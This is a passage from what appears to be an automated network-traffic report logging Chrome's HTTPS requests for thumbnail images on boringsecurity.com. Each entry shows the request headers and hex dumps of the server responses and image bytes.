                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:00 UTC447INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 4c 70 4d 79 51 68 31 43 34 62 47 63 6d 4b 78 36 58 6e 33 75 66 4d 2f 76 58 45 74 6f 4d 45 2f 47 37 4e 4a 48 73 39 63 62 73 69 52 79 77 6a 2f 37 4c 6b 2f 69 37 49 77 74 30 46 34 34 4f 6a 55 36 61 43 64 75 53 32 73 49 48 69 63 66 58 79 57 31 66 4f 74 73 43 59 39 42 33 66 64 4f 69 47 6d 52 49 76 6f 47 62 6c 47 57 71 61 4d 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 50 4e 48 43 45 32 50 45 30 4a 47 31 50 57 4a 4d 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 37 20 4a 75 6c 20 32 30 32 33 20 30 32 3a 35 30 3a 35 33 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: LpMyQh1C4bGcmKx6Xn3ufM/vXEtoME/G7NJHs9cbsiRywj/7Lk/i7Iwt0F44OjU6aCduS2sIHicfXyW1fOtsCY9B3fdOiGmRIvoGblGWqaM=x-amz-request-id: PNHCE2PE0JG1PWJMDate: Sun, 10 Dec 2023 16:45:01 GMTLast-Modified: Mon, 17 Jul 2023 02:50:53 GM
                                                                          2023-12-10 16:45:00 UTC1509INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c d4 bd 75 74 55 e7 da ee 9d ee ba ec 7a 77 8b bb c4 dd dd dd dd 85 84 38 21 58 02 41 83 bb bb 17 68 29 52 5c 4b 95 3a b4 94 42 29 6d b1 0a 52 bc b2 f7 19 e7 bc ef 38 d7 37 ee 7b ca 7a e6 5c 73 ad 04 da f3 8e f1 fd 71 8f b9 34 a5 e4 c7 75 dd f2 3c cf b4 f9 f4 8b 2f f1 19 c5 97 27 f0 f9 97 5f e1 f3 13 5f e1 d8 57 27 71 9c e2 e4 d7 f8 e2 eb 53 f8 92 e2 d4 69 9c 38 75 1a 5f 9d fe 86 e3 e4 37 67 38 be 3e f3 2d c7 a9 6f cf 72 9c 3e fb 1d be a1 f8 ee 3b 9c f9 ee 7b 8e 6f bf ff 81 e3 ec 0f 14 e7 38 be 3b 77 9e e3 fb f3 14 17 f0 03 c5 85 8b 1c e7 2e 5e c4 f9 8b 97 70 fe d2 8f
                                                                          Data Ascii: PNGIHDRMpHYs IDATxutUzw8!XAh)R\K:B)mR87{z\sq4u</'__W'qSi8u_7g8>-or>;{o8;w.^p
                                                                          2023-12-10 16:45:00 UTC16384INData Raw: 55 33 e0 6e b6 95 c7 99 6c d5 4c e5 14 e8 6e eb 0b 08 71 02 61 82 ee b6 95 7c 8e a7 10 fa 7c ee ae ce 5a ef 19 3a e9 35 15 34 8d c5 d2 f3 3f 65 e0 da c8 e3 da ac 54 d5 d6 88 1e b8 ef ee 11 38 23 4b 35 28 1a 7e fa 49 9e 30 c8 b0 59 01 ee 17 19 38 be 5a 52 38 02 ee 9a 3c 69 50 80 e3 c7 d6 80 bb ce 80 59 07 ce a0 52 bd a9 05 4e 84 ee 96 d2 2a 11 8b 07 d5 4a 15 e8 e4 02 c2 cc 5a b5 f9 1c b7 4b ee fe 0d f9 1c 43 26 42 67 ca e7 ac 42 67 c1 62 6d 3e fe 9c 80 b3 90 c7 59 99 38 18 03 a7 b4 46 da 03 9c b5 c6 af 36 87 63 85 53 db 21 c2 58 8b 66 a9 2a 70 f2 58 4b e9 c3 89 c0 b1 9d 2a b9 9b a9 42 b5 04 9c f4 98 ec 54 37 4b b5 d4 16 d1 03 27 5f 35 79 dc 2d 53 01 61 9c c7 c9 00 2a 90 dd be 23 41 48 57 25 77 13 a0 bb dd 56 d5 6a 94 cf 59 80 ae 3d f9 9c a6 72 b5 04 9d d2
                                                                          Data Ascii: U3nlLnqa||Z:54?eT8#K5(~I0Y8ZR8<iPYRN*JZKC&BgBgbm>Y8F6cS!Xf*pXK*BT7K'_5y-Sa*#AHW%wVjY=r
                                                                          2023-12-10 16:45:00 UTC1024INData Raw: 84 50 02 90 1e bf fb fe 07 38 f8 f6 bb a8 6d 1e 83 67 5e ea 00 77 6f 6f cc 59 b8 00 cb d7 ac 62 85 0b 0e 0f c5 94 19 d3 71 fc c4 97 98 38 65 32 7a f7 ed cb 8d e0 f7 3e fc 00 e3 27 b6 e2 85 17 5f e4 62 61 ef c1 03 fc 3e 9d 0f f7 e2 4b 2f 21 3a 3a 8a 61 20 15 22 40 a8 da 24 0b a4 02 80 a1 8b 8f e5 76 08 41 97 99 9e ca 2a 97 97 9b c7 2b 80 e9 f3 92 f5 26 72 0e 48 8a 96 9a 4c b9 5f 02 03 47 e0 45 84 87 f1 6c 56 81 8e fe 3b 04 9d 8f 97 27 ab a1 12 3e 3e de 68 18 32 8c 37 c4 9c f8 fa 1b 86 ed fa cd db 68 69 19 8d 57 5e 7e 19 ef 7d 70 14 df d1 a1 8b df 7c 8b 6f c8 4e 15 4b e5 eb f7 0c de a9 33 67 58 b1 de 7e f7 3d 74 e9 da 4d 86 ee 61 09 38 52 ba 07 fe 81 87 1e 79 0c ff 78 f8 31 d4 0e 6a c4 ad 3b 77 f9 20 6e e5 c6 2a ea 1d 7d 7e 32 88 9f 4d c1 c0 e9 00 d4 c0 67
                                                                          Data Ascii: P8mg^wooYbq8e2z>'_ba>K/!::a "@$vA*+&rHL_GElV;'>>h27hiW^~}p|oNK3gX~=tMa8Ryx1j;w n*}~2Mg
                                                                          2023-12-10 16:45:00 UTC7544INData Raw: 7b f7 1f 40 61 71 29 5c dd 3d e1 ed 17 80 c5 4b 97 73 e3 95 94 f0 a2 78 fb 28 f9 b9 1e bc 8b 4a fc a4 04 dd df 4c 00 51 0f 9f aa 7c 06 aa a7 14 1a 3f ff 42 c0 bd c9 39 1c b5 45 c4 3e 9c b2 5c 49 03 de 41 09 3c ab ca c7 71 84 43 6d a7 18 41 68 11 44 29 28 8f 6b 9e 38 0d a1 c9 59 08 88 4b 43 58 5a 3e e2 f2 cb e1 13 99 80 f8 94 54 2c 58 bc 90 37 cf bc dc b1 03 17 0d 23 46 36 f3 08 cb 3f 28 10 81 21 c1 e8 d2 ad 2b b7 46 b6 6c df 8a b5 af ae 83 bd 83 03 1e 79 f4 11 0c 1a dc 00 3b 7b 3b 14 97 95 a0 71 48 23 02 68 10 af f6 cf 22 59 8d 44 f8 78 aa 10 17 c3 bd b7 82 82 42 64 a4 a7 a9 95 6c 46 7a 2a ea ea 6b 79 3f 04 0d fd 69 2a 41 2a 47 ab 4c 68 52 91 9d 29 81 47 ca e6 e3 ed c9 95 2a 8d c5 02 a8 55 53 53 8f 53 df 9c e5 5f 0c 59 e7 d4 e9 b3 60 6f 67 8b 84 84 04 7c
                                                                          Data Ascii: {@aq)\=Ksx(JLQ|?B9E>\IA<qCmAhD)(k8YKCXZ>T,X7#F6?(!+Fly;{;qH#h"YDxBdlFz*ky?i*A*GLhR)G*USSS_Y`og|
                                                                          2023-12-10 16:45:00 UTC9000INData Raw: 7c 0c dd f1 48 d5 1f e1 95 5b d7 0b a1 aa 10 a1 62 35 7c a3 92 a0 ab ed 40 41 d3 08 22 a4 d9 5c 50 9d dc d8 c7 e3 f7 be cf a0 ad 3d 78 0d 73 37 1f 61 66 ff 11 46 6e ec 62 66 6d 15 df f8 de fb 98 5d 5a 80 3c 27 0f 1d 53 cb ae e2 ec e2 26 b7 ad 9a 87 67 50 d5 3e c0 47 fd 14 ba 22 c4 88 d2 b9 ad 44 13 c2 3c a4 79 c5 1b d7 c3 e3 10 9a ac 80 20 4d 8b 58 79 01 84 0a 3d 17 8f 09 42 52 c0 44 8d 05 29 f9 e5 90 1a 6b 90 51 d2 04 75 4d 2f ca 06 56 d1 38 b3 8b bc d2 5a 0e c8 bd 5e f2 e6 84 82 c6 91 ae 85 c6 20 db 64 e5 bb 0b 96 76 ef 22 bf b8 0a be e1 71 c7 b0 1d d9 11 74 a4 72 e1 42 31 c2 19 36 09 a2 12 a4 0c dd 75 6f 1f 5c b9 f2 12 fc fd 03 60 2a 2a e5 e7 d9 fd 6b 57 af 5e 43 78 44 14 72 f3 0b d0 d0 d2 85 ae 91 59 ac ee de c5 cc d2 3a 22 63 e2 40 b3 86 fe 11 f1 88
                                                                          Data Ascii: |H[b5|@A"\P=xs7afFnbfm]Z<'S&gP>G"D<y MXy=BRD)kQuM/V8Z^ dv"qtrB16uo\`**kW^CxDrY:"c@
                                                                          2023-12-10 16:45:00 UTC2875INData Raw: 0b 42 c8 28 9e 4c 51 e6 f3 59 86 44 a5 81 37 2f 51 4b 4b ec 8e dd e2 55 85 10 2a 0c 10 ca 0b 10 af 34 b2 4b 25 45 a6 d8 93 ca 1d 94 8d 92 5b 8d 97 66 41 5b 5c 87 dc e2 3a 18 6c 4e d8 7b a7 61 ef 9e 60 75 53 ea cb a0 32 58 d9 e8 6d 82 8d c0 53 19 ca 90 57 5c 83 c2 aa 66 1e 61 6a 1d 9a 63 00 1a 7b 27 b9 6f 4b c5 e0 c8 28 01 92 c5 69 b0 94 95 23 3e 49 84 ba a6 36 86 ad 6f da e5 56 49 a1 c8 cd 12 70 34 ea b4 b8 7d 07 2b bb f7 60 b0 94 f3 09 2f bf f0 38 56 b9 14 6d 31 74 d5 1d b0 75 4e 41 46 d7 3c c9 94 a8 6a e9 c7 d4 da 2d 2c ee 3c c0 eb df f8 2e 3e f9 f4 f3 d3 6e d4 03 b4 0f 7e f9 d1 0b db 79 e0 9d 82 cf 43 ed 3e fa 4f a8 9d 17 dd 25 4f 2e d5 44 41 3b 35 d3 ab 9c 5c ac 55 15 56 f2 e1 62 02 89 62 b6 58 51 3a cf e5 93 b1 c2 a5 64 f0 0b 18 ef 56 39 32 4e 24 32
                                                                          Data Ascii: B(LQYD7/QKKU*4K%E[fA[\:lN{a`uS2XmSW\fajc{'oK(i#>I6oVIp4}+`/8Vm1tuNAF<j-,<.>n~yC>O%O.DA;5\UVbbXQ:dV92N$2


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          167192.168.2.54990075.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC783OUTGET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_fantasy_a05d6f97a9.jpeg&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:00 UTC412INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 35 30 39 33 32 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 34 63 36 2d 39
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 50932Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 1222Content-Security-Policy: default-src 'none'Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:45:00 GMTEtag: "4c6-9
                                                                          2023-12-10 16:45:00 UTC774INData Raw: ff d8 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 00 30 00 30 03 01 22 00 02 11 01 03 11 01 ff c4 00 19 00 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 06 02 01 03 ff c4 00 18 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 88 6f b7 d6 69 80 ed 46 0e 87 8c 66 92 76 74 29 d9 dd b2 39 00 52 8b e4 a9 67 f2 e7 21
                                                                          Data Ascii: C $.' ",#(7),01444'9=82<.342C2!!2222222222222222222222222222222222222222222222222200"oiFfvt)9Rg!
                                                                          2023-12-10 16:45:00 UTC448INData Raw: ae 1d ea e0 64 23 cb 01 1a cc 5a cc a5 4f 18 43 ec 2e 55 c4 4e 5a f3 16 9b c4 a0 af 77 09 37 74 31 97 af eb 2c ee 0d 09 76 6a 63 ba 2f ec a0 a5 aa 65 a7 a3 f5 2c 0e 87 c5 9f ff da 00 0c 03 01 00 02 00 03 00 00 00 10 32 4b ad d0 1d fb 3f ff c4 00 19 11 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 00 11 21 31 51 ff da 00 08 01 03 01 01 3f 10 69 ac 4e 18 1f 16 07 bd f2 db 61 a7 4b af 08 03 0b ff c4 00 19 11 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 00 11 21 31 c1 ff da 00 08 01 02 01 01 3f 10 5d 90 bc 27 73 d4 a4 87 21 e1 df 3e db 31 b8 7c 83 65 ae df ff c4 00 22 10 01 01 00 02 02 02 01 05 01 00 00 00 00 00 00 00 01 11 00 21 31 61 41 51 71 81 91 b1 c1 f0 a1 ff da 00 08 01 01 00 01 3f 10 52 44 fd ed df f9 8c ca d2 54 0f 0d f8 c8 c2 02 76 97 57
                                                                          Data Ascii: d#ZOC.UNZw7t1,vjc/e,2K?!1Q?iNaK!1?]'s!>1|e"!1aAQq?RDTvW


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          168192.168.2.54990175.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC775OUTGET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_MAYC_7e6a35562a.png&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC415INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 31 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 33 35 2d 7a 62 56 76 42 57 57 32 52 49 59 77 6c 72 66 41 55 6e 4f 6a 6c 43 47 63 48
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 1Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Security-Policy: default-src 'none'Content-Type: image/pngDate: Sun, 10 Dec 2023 16:45:01 GMTEtag: 35-zbVvBWW2RIYwlrfAUnOjlCGcH
                                                                          2023-12-10 16:45:01 UTC2135INData Raw: 38 35 30 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 03 00 00 00 60 dc 09 b5 00 00 03 00 50 4c 54 45 e6 8d 40 df 8a 3f e7 8d 3f ea 8d 3c df 8a 3f de 89 3f e1 8c 40 d4 82 39 e2 88 39 e0 8a 3f e3 8c 3f e3 88 3a e6 8b 3e ed 90 3f dc 81 35 d3 7e 38 6e 00 ab c2 7e 3e 4f 00 89 aa b1 67 c4 c6 c5 58 4e 65 4e 5c 67 9b a1 8e cc 82 3c a6 69 35 de 85 39 20 4c 1c d5 e3 8f 7f 8b 63 5f 6e 79 27 4d 1e 2f 00 57 a1 ab 63 de df d9 a6 a5 a8 67 7b 8a 68 04 9f af ba 6a 6d 73 49 88 94 62 9c a5 5c c0 c4 b3 c2 77 38 94 64 43 16 40 0f b9 71 36 87 65 46 ad af a7 22 3c 15 3c 07 7a bd ca 81 40 4b 57 6f 71 73 05 11 ca 51 3c 41 45 4d 27 8a 98 76 5d 00 f5 77 7e 44 d8 85 3c 88 8b 8e 94 9d 55 ab 9d 54 86 31 6e df 87 3c 9b 6f 35 b4 b3 b4 5e 5e 54 5e 61
                                                                          Data Ascii: 850PNGIHDR00`PLTE@??<??@99??:>?5~8n~>OgXNeN\g<i59 Lc_ny'M/Wcg{hjmsIb\w8dC@q6eF"<<z@KWoqsQ<AEM'v]w~D<UT1n<o5^^T^a
                                                                          2023-12-10 16:45:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          169192.168.2.54990375.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC548OUTGET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC408INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 35 30 39 33 32 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 39 39 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 45 74 61 67 3a 20 33 35 2d 62 30 59 31
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 50932Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 1599Content-Security-Policy: default-src 'none'Content-Type: image/pngDate: Sun, 10 Dec 2023 16:45:01 GMTEtag: 35-b0Y1
                                                                          2023-12-10 16:45:01 UTC778INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 03 00 00 00 60 dc 09 b5 00 00 01 3b 50 4c 54 45 c4 66 ff ca 68 ff d0 6d ff 65 00 9a fd fd fe c1 64 fc c3 65 fd ff ff ff fc fc fc ff ff fe d2 6d ff ce 6b ff c6 67 ff c3 65 fe d4 70 ff be c0 bd 3e 3f 3d c7 cb c4 39 04 56 f7 f9 f5 62 63 61 04 02 06 f1 f4 f0 80 82 7f be 60 f2 4d 4a 4f 61 29 80 6c 6a 6d da dd dc a6 ab a6 89 8c 88 58 5a 59 40 02 64 93 94 93 71 72 71 f7 fb ff b7 5b ea c1 60 fa ae af ad 78 7b 78 93 46 bd 62 59 66 a6 54 d6 29 12 37 b5 b7 b5 b0 58 e1 88 43 af cc d2 cd 20 1c 1b 45 43 45 4e 04 76 68 37 84 e8 ec e9 3a 1b 46 9b 9f 99 e1 e3 e0 4b 2a 5c 7c 37 a2 54 29 6c 63 53 3e 35 36 35 5b 2e 72 cb 6b ff 6d 2f 8f a5 5e 00 d6 db d3 29 29 29 70 03 a5 46 2f 52 53 50 54 9a 48 cb a1
                                                                          Data Ascii: PNGIHDR00`;PLTEfhmedemkgep>?=9Vbca`MJOa)ljmXZY@dqrq[`x{xFbYfT)7XC ECENvh7:FK*\|7T)lcS>565[.rkm/^)))pF/RSPTH
                                                                          2023-12-10 16:45:01 UTC821INData Raw: c5 e5 9e dc 55 56 e7 2a 61 3f 2d f4 f2 fe 60 b8 48 87 0e be 4f 01 55 26 84 10 25 cd 9c 66 9b 2c 2b 3b db 1c a0 50 be d5 42 52 c3 00 0c bc 8d 45 41 76 09 f9 a6 20 23 75 2e 8c ac b4 58 d9 18 3c df 33 f6 f0 58 7a 70 80 83 b5 b1 73 75 7e 7e 3a b1 aa 22 51 03 69 91 bc 4c de 85 90 2c 54 4a 51 b6 b1 ed 87 8a 73 78 2c 25 0c a0 48 56 f2 7d 1f b3 ed a2 4d 9c 27 bd b4 a2 30 42 96 65 46 d8 e9 d2 2e 78 c0 1d 4e dd 87 12 e7 de 18 60 44 44 16 16 83 e7 34 a0 ba 84 92 5e 38 ca 3b 09 72 09 b7 01 9b 20 44 ec 40 c9 00 70 77 ef 73 29 ff 79 e2 02 28 12 ab 7d 0c 18 83 31 10 89 fd d8 a7 60 e8 21 51 26 ce 66 29 a0 c9 2e 44 c4 47 dd 03 f4 7b 26 f0 70 27 35 22 80 91 d2 8a 32 15 02 7f d7 99 71 76 bd ac 2b f1 90 96 51 f2 b5 c9 50 b6 09 22 7b a1 1c 80 bb ba 77 7b 7c 7c 01 14 50 3e c8
                                                                          Data Ascii: UV*a?-`HOU&%f,+;PBREAv #u.X<3Xzpsu~~:"QiL,TJQsx,%HV}M'0BeF.xN`DD4^8;r D@pws)y(}1`!Q&f).DG{&p'5"2qv+QP"{w{||P>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          170192.168.2.54990275.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:00 UTC689OUTGET /_next/image?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:01 UTC506INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 31 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 2f 5f 69 70 78 2f 77 5f 34 38 2c 71 5f 37 35 2f 68 74 74 70 73 25 33 41 25 32 46 25 32 46 62 6f 72 69 6e 67 2d 73 65 63 75 72 69 74 79 2d 63 6d 73 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 25 32 46 74 68 75 6d 62 6e 61 69 6c 5f 71 75 69 74 5f 62 33 65 39 32 36 39 34 62 31 2e 70 6e 67 3f 75 72 6c
                                                                          Data Ascii: HTTP/1.1 301 Moved PermanentlyAge: 0Cache-Status: "Netlify Edge"; fwd=missContent-Type: text/plainDate: Sun, 10 Dec 2023 16:45:01 GMTLocation: /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png?url
